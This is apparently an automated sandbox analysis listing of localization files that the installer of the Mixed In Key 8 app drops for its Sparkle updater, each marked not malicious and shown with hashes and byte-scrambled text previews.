                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_fdyCai
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3656
                                                                                                    Entropy (8bit):4.828274685627281
                                                                                                    Encrypted:false
                                                                                                    MD5:69B7C9EBCFB043EE4647310C2DF9F853
                                                                                                    SHA1:5B21F99F4F0492303EBEDFDF725F4FBA74A95E6C
                                                                                                    SHA-256:9A630D799DE61271D8E903D22A97265DA9F61B43D41D749CF03080A9A4CD0227
                                                                                                    SHA-512:0420A45902C10E12DF013C0A0EB0C2E059E9710B47A82F82013A578D7968DCCDA8727BFA6878778A94D5A6070BBFF96D0F4B1B7791B7BE91FE029738A882739A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @reh neet tgok al rit lrbgu !iV ludi snatllre egog netsraet% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nkieko dptaresen .. red t.kr.sef are nuk n.ls.ab rneeh.dF yl t1%@$t lim paep nrPgoarmmre ,egsnattrd rerf agop .rv.i eg.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @red nea tkeull eevsroi.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ritgl..gnlegi !uDh ra% $3.@S ak led nehtnsen ?u;"..%" @odnwoldade " =%" @ehtnte;"..%" @fo% "@= " 1%@$a f2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa f@%e ritgl..gnlegi"!.;". Aen wevsroi nfo% @sir aeydt onitsla!l " =E" nynv reisnoa f@%e rlkrat lii snatllreni!g;"..A" nreor rcoucrrdei n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_0BzEPj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3674
                                                                                                    Entropy (8bit):4.847547878248266
                                                                                                    Encrypted:false
                                                                                                    MD5:A1EB1385AD11092F71BA5FF256F0CEDC
                                                                                                    SHA1:A8DECBC94F5C531A7A37C54875961CDF7DF93F9B
                                                                                                    SHA-256:1F4B5B48B961337D1604691A88FDBF1B149F60E0E33E0A54A8E1D6E27938526C
                                                                                                    SHA-512:093237B75CAD280097AC304C28384F6D7CAC792800CE80D6C562235F69D84889072C5D1D37DCBC2058C7C858315EE0D5DC0B480A4267598D9B1BDA06B2B3CCC0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @uwdr eehurtnreegaled nnu dtshe tuz reVwrneudgnb reie!tM ..hcet niS e1%@$j tetzd ruhcd ein ue eeVsroi nreesztneu dnn ues attrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @aknnn citha tkauilisre tewdrne ,ewnne sov nieen moVulem nhoenS hcerbiuzrgfi fz(B. .iDksI amego ed rDCD/DV )egtsraet tuwdr.eK poeier niS e1%@$i ned nrPgoarmm erOndre ,kautlasieier niS esev nod ro.t;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @si tuz reZtid ein ueseetv re.fg.aberV reisno"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @si tevfr..bgra( iS eevwrneed neVsroi n3%@$.)M ..hcet niS eid eeneuV reisnoj tetzh renuetlrdane"?.;".@%d wolnaoed"d= " @%h renuetgrledane;"..%" @fo% "@= " 1%
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_tgHdre
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4422
                                                                                                    Entropy (8bit):5.1911339140660395
                                                                                                    Encrypted:false
                                                                                                    MD5:DA4EBB595EB2C4CF1BD8199EC95141AE
                                                                                                    SHA1:DFEF8A3FC52B07BEB322A49AEB90AC2550880193
                                                                                                    SHA-256:5E22748AC7C634DE19F1A0F0D32BECB495F646DF879F88FBA0F56F57372D4440
                                                                                                    SHA-512:BFB8435F916678EF4A291B3B4AF4B5FF26B58F91508D940F57642410F7B0483B8425C49C171E2B1F2779E171742F4C1B19F934D4249C075E002148A6919284E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ....% $1 @2%@$. ...... .............. .... ............ .......... .......... ........!.. .. .............. .. ...... ........................ ........ .. .............................. .. .1%@$. ......;.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ....% $1 @....... .......... ...... .................. ........ .......... ........ ...... ............ ................-.......... .......... .......... ........... ...................... .. .1%@$. ...... .............. ................ ....... ,........................... .. ........ ......,.. .... ..........................."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =.".. .1%@$% $2 @........... .................... ................ ............."..;".@%% @sin woa avlibael
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_3DQC00
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4132
                                                                                                    Entropy (8bit):4.792047857345539
                                                                                                    Encrypted:false
                                                                                                    MD5:2CC426B92381ABE3E2E44E43FB6D2655
                                                                                                    SHA1:EDA564CFCE0C270EAB65ABA0E23A6CEF28A33789
                                                                                                    SHA-256:11443A9A18E0DA638B61A4EDA53A87BEF3B4900662432B4663406CF7932DB207
                                                                                                    SHA-512:AF170445DEDA1EC65DAD7F37AC35789E1F236E8C520DF72422CE56F84687D09A82DAEC5C222ADF58503362B2075B7DA7E1314FFBB9BCFE92C6CCF22B9707450F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$c na..t.b epuadet dhwnei .t.. surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb-ey-uo
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_zVwsky
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3568
                                                                                                    Entropy (8bit):4.881888869875779
                                                                                                    Encrypted:false
                                                                                                    MD5:904BBB71B712CEDEF3897E39A6E2BE8E
                                                                                                    SHA1:8E5118B8BAE7CF21F81BBE34581C4BBA7587EFF3
                                                                                                    SHA-256:F89FCD9201741E9BC02500BD4D61116EE20D94004A240EFB8A346370825F14E0
                                                                                                    SHA-512:AC861D30DFF280025A9B4DC8D07A6CBDC8977D22EE44F61591504A291F12C15B230C1827C3CFE6B20CB07699904A27193C4242EFF5A9B80958CB82A212C35DA7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @esh nad seacgrda o yse.tn.l siot saparu itilaz.r. L. eugtsra.. anitslarae i inicra% $1 @haro?a;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n oesp eueda tcauilaz rucnaods ejecetu aedds enuv lomuned e.sl. oeltcru aocomi ameg nedd sioco m deoi. p.itoc .uMve a1%@$a s uacprte aedA lpcicaoien s yrtta eedi inicraold seeda ll.."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e sal. l.itamv reis.. nidpsnobiel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsnobiel( suet ditne eal% $3)@ ...eDes aedcsraaglr aharo?a;"..%" @odnwoldade " =%" @edcsraagod;"..%" @fo% "@= " 1%@$d e2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."H.yau ann euavv reis.. ned% .@!.;"..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_1ROV7Q
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2500
                                                                                                    Entropy (8bit):4.8752165718531755
                                                                                                    Encrypted:false
                                                                                                    MD5:8A8DB0FF1F7E062F789594FC566C8000
                                                                                                    SHA1:19921C6F3E817D4C31A5C23E9C3D3D39D7E82CEF
                                                                                                    SHA-256:1DD3B764E2F93C0238541D0C748359CBB5E88B3CAB708CBE6269FA5D5073697E
                                                                                                    SHA-512:0DFC6DE43FA9B23BB34F710E9B0ADA5613F2C306D0863A2B9F249AEA9E8170BC88C11578C7B713D481767F46B24FB29175A0B458E18BD731675A28138DBE596B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$/ % $2"@.;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%"$1 @2%@$o nsaneentt uajo navmliiank ..ty.t..n.s uearvanak rear nuk n3%@$k ..nyintste....!nH laaukt o.ky.nnsi.t.. .hoejmlnau duleelne"?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$o nuuis nastavalialo elavv reis.o;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @non tys aaativll as(nilualo n3%@$.)H laaukt oaladats nen ty"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =K"..ty.tj...ll..% @ieo elo kiueskaio jhleam naksnoino !jAtaoko jhleam aelyvitdesootts?aJ soe ,tk sy ypaauj ..jrseetml.. nly.lp.ti...jl..t..;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =U"su ievsroio jhleamts a@%o nsaneentt!u;"..A"n wev reisnoo f@%i svaiaallb!e " =U"su ievsroio jhleamts a% @nos aaativll!a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_ZEbXN1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3714
                                                                                                    Entropy (8bit):4.888751024111058
                                                                                                    Encrypted:false
                                                                                                    MD5:225C9BA3FFB0766A5AC5D371BB6B15FF
                                                                                                    SHA1:AD66D63630381BAC884BD90361B0DA0C37E4E073
                                                                                                    SHA-256:78FDC8F099DB63A427C3143BC2E5967C054BE0A460596CB265DB9010E9F0CC65
                                                                                                    SHA-512:39F98DA8AB95F8B605DF0945A2A276D66F74F8F11920DB71A37C8587B5BC7CD53EC90A15FA573FF34F9347D3B9AB9BF008D29BCEA9A07CBBF0F72BFCBAE710C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ a...t ..tl...hcra.g..V uoel-zovsul ..i.snatllree teralcnre% $1 @amnietantn.."?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @enp ue tap s..rt eim s..j uo ruqna dlif notcoinn e..p rait r.d..nuv lomu enel ceuters ueel ,ocmm enu emiga eidqseuo unul ceetruo tpqieu ..Dp.alec z1%@$d na sovrt eodssei rpAlpcitaoisn ,eralcnzel- e..p rait redl ..e t.re.ssyaze"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e tsl aevsroi nalp ul s.rc.neetd siopinlb.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e tsd siopinlb.e;.v uo stulisizel aevsroi n3%@$ .oVluzev-uo selt ...lc.ahgrrem iatnnena.t?.;"..%" @odnwoldade " =%" @.tl...hcra.g"..;".@%o f@% " =%"$1 @us r2%@$;"..A"n wev re
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_fOBgBb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2604
                                                                                                    Entropy (8bit):5.008724955056715
                                                                                                    Encrypted:false
                                                                                                    MD5:3270BA6D293CD90010791C5FF09BFD8F
                                                                                                    SHA1:678084F1C133B194FF3F2C23F05D9B84D1B31E95
                                                                                                    SHA-256:47E5E47BCDB90558D6CE23284BC7E9F7950ADBA18F0C465190BC62047F36A14B
                                                                                                    SHA-512:BE9F91D4CA8FCCE76805C074FF94BB5C143866B7B2DADEFA309235A64B1579AC688E5D02CC5E5854AF3F9EE6B9E0468B4A154EE453E636390DD3A82080884CFB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @............. ........ ............ .......... .......... ...... ............ .. .3%@$! . .......... ..........."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .... ............ .......... ............."..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ...... .......( ..... .. .3%@$.). .......... .............. ....?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " ..% @....... ........ ............ .......... ................. !....... .... .......... -.d si cmiga?e. .. ..... ,....... ...... ............ ........;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =."...... .......... .. .@%. ..........!.;"..A"n wev reisnoo f@%i svaiaallb!e " =."...... .......... .. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_DbQkju
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_GEYvY0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_5Gcdsl
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2486
                                                                                                    Entropy (8bit):4.941691582568595
                                                                                                    Encrypted:false
                                                                                                    MD5:658C922C387DE9085433993836674519
                                                                                                    SHA1:CD1BD898E900C35295BA365441EAE812987A92D1
                                                                                                    SHA-256:7BA6A77B194445F35D135E3C361BED3BA394D8AEBC9950F3E9FB32700177E141
                                                                                                    SHA-512:C6989CAEBFC7EBEF557126A1CFAD44B4CBFFD87A32186AA0DE2A33214F3D20034716E3FFCE4AA2104B32E50D5D9C739CF0521CF5D66D1651E54C8B383A17D29E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " @%a f@%;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " @%% @ehuf revir..s te tni ngov re..rut li.tk. tiv..n ..ts u.rs.niug% .@V liute dnru.rs. a.nn.?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @ren ..ajts a..gt..af nes mref ..nael g..seass utdnni.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."t.agaf% $2 @fa% $1 @ren ..f ..naeltge n....e trm .e .3%@$ .iVtl u.sk.ajh na a.nn.?a;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h ferue kk iehmili dit l.a .ksiraf. ..mp.upf roirstni!sE tr u.a .ekry aofrrti.i .fad simkny?dE fkeiks aktl u.r..f...ar. i. giv..k reifssjt..arnn"..;". Aen wevsroi nfo% @ah sebnei snatllde"!= " .N ...gt..afa f@%h feruv re.i .estti nn"!.;". Aen wevsroi nfo% @sia avlibael"!= " .N ...gt..afa f@%e r.fa.lnge"!.;".nAe rr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_nQia5J
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3646
                                                                                                    Entropy (8bit):4.843902978796583
                                                                                                    Encrypted:false
                                                                                                    MD5:C61AEA0FF202980A419D3EAC48D869A3
                                                                                                    SHA1:46FBDD60C2BD71A907CC52B0800486485C68DE69
                                                                                                    SHA-256:D85F1741E25D66D2A3C156BFE983F2AAB4390BD4580E67F502C7DD672EBE59DD
                                                                                                    SHA-512:4CDEE53C104BF1541D663E62FD0E2D1745B45941CF5DE9536A56674649B0649C964FE0ECC2BF5D6B82EDFC5709107D9123207CF3E2F58279A172994B0C51C766
                                                                                                    Malicious:false
                                                                                                    Reputation:low
